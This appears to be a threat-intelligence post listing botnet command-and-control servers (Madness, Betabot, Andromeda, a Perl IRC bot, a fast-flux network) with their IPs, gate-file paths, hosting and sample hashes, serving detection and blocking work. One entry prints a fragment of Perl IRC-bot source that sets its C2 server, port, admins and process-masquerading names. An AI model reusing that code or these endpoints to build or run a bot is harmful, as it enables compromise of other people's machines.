Resolved ajw555.myjino.ru to 81.177.141.241
Server: ajw555.myjino.ru
Gate file: /index.php
This is the same domain as the previous madness botnet.
Hosting info: http://whois.domaintools.com/81.177.141.241
Related md5s (Download sample from Malwr.com)
Madness: c45034111810d1a56ba6b72acc63bdf5
dorblu99.net (WordPress bruteforcing botnet hosted by hetzner.de)
Resolved dorblu99.net to 88.198.17.49
Server: dorblu99.net
Gate file: /cmd.php
Hosting info: http://whois.domaintools.com/88.198.17.49
Related md5s (Download sample from Malwr.com)
Malware: 1e8cd0f0f1702820c870302520bc0176
perl.jorgee.nu (5k perl bots hosted in Germany Hurth Intergenia Ag)
Credits to AliSs.
$p = "";
for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; }
my @ps = ("ps","syslogd","init");
my $processo = $ps[rand scalar @ps];
$servidor='perl.jorgee.nu' unless $servidor;
my $porta='8080';
my @canais=("#perl");
my @adms=("M","st0n3d","x00","Jack");
my $linas_max=10;
my $sleep=5;
my $nick = getnick();
my $ircname = "x00";
my $realname = `uname -vr`;
my $uname = `uname -a`;
my
xylox.su (Betabot and Andromeda http botnets hosted by Panamaserver.com)
Resolved xylox.su to 190.123.45.12
Betabot Gate file: /forums/order.php
Andromeda Gate file: /foo/image.php
Hosting info: http://whois.domaintools.com/190.123.45.12
Related md5s (Download samples from Malwr.com)
Betabot: a670deb3dd6febfcfda8392305041657
Andromeda: 26c7885b95501af4da1ffa621f793027
shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)
Resolved shatteredwow.com to 63.143.49.122
Server: shatteredwow.com
Gate file: /beta2/order.php
Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com
Hosting info: http://whois.domaintools.com/63.143.49.122
Related md5s (Download sample from Malwr.com)
Betabot: e5a03d368fd4fca8b45c83a05dab6ced
nomoguz.su (Betabot http botnet hosted by fastflux)
Server: nomoguz.su
Gate file: /SDF9his/yefgvrtu.php
Alternate domain: cooncatcher245.com
The same fastflux setup is also hosting this Betabot.
Hosting info:
;; QUESTION SECTION:
;nomoguz.su. IN A
;; ANSWER SECTION:
nomoguz.su. 131 IN A 5.165.17.205
nomoguz.su. 131 IN A 176.194.193.47
nomoguz.su. 131 IN A 66.231.16.101
nomoguz.su. 131 IN A 145.255.33.9
nomoguz.su. 131 IN A 188.0.98.100
nomoguz.su. 131
nigazz.com (Betabot http botnet hosted by besthosting.ua)
Resolved nigazz.com to 194.28.173.217
Server: nigazz.com
Gate file: /neg/order.php
Alternate domain: niggazz.com
Hosting info: http://whois.domaintools.com/194.28.173.217
Related md5s (Download sample from Malwr.com)
Betabot: 7355a0c56919550566ca50e33162f993
fpsfreedom.net (Betabot http botnet hosted by alibabahost.com)
Resolved fpsfreedom.net to 37.221.170.65
Server: fpsfreedom.net
Gate file: /order.php
This seems to be used for increasing website and video stream views: it opens the page hxxp://www.fpsguides.com/hidden in three hidden Internet Explorer windows.
Hosting info: http://whois.domaintools.com/37.221.170.65
Related md5s (Download sample from Malwr.com)
Betabot: 8cc7c93530430201871f07f1be3a26e6
dayzstreaming.co.uk (Betabot http botnet hosted by alibabahost.com)
Resolved dayzstreaming.co.uk to 37.221.170.194
Server: dayzstreaming.co.uk
Gate file: /gato/order.php
Alternate domain: dayzstreaming.org.uk
Hosting info: http://whois.domaintools.com/37.221.170.194
Related md5s (Download sample from Malwr.com)
Betabot: c0d2e08c3f0d964858b8a9788aa6732e
goodfluxetcwow1.com (Fastflux hosting botnet hosted by mnogobyte.ru)
Resolved goodfluxetcwow1.com to 146.255.195.104
Server: goodfluxetcwow1.com
Gate file: /forum/7f4765027f274bbc95328d79fa668b75.php
Alternate domains: goodfluxetcwow2.com, b437571f9061b10e5d33c66c83df359e.ru
This is the malware component of a fastflux hosting setup. Once installed on a computer it opens a web server on port 80 and a DNS server on port 53.
Current IPs used by the setup: hxxp://goodfluxetcwow1.com/system/http.php
Page showing example forwarding: hxxp://goodfluxetcwow1.com/system/test.php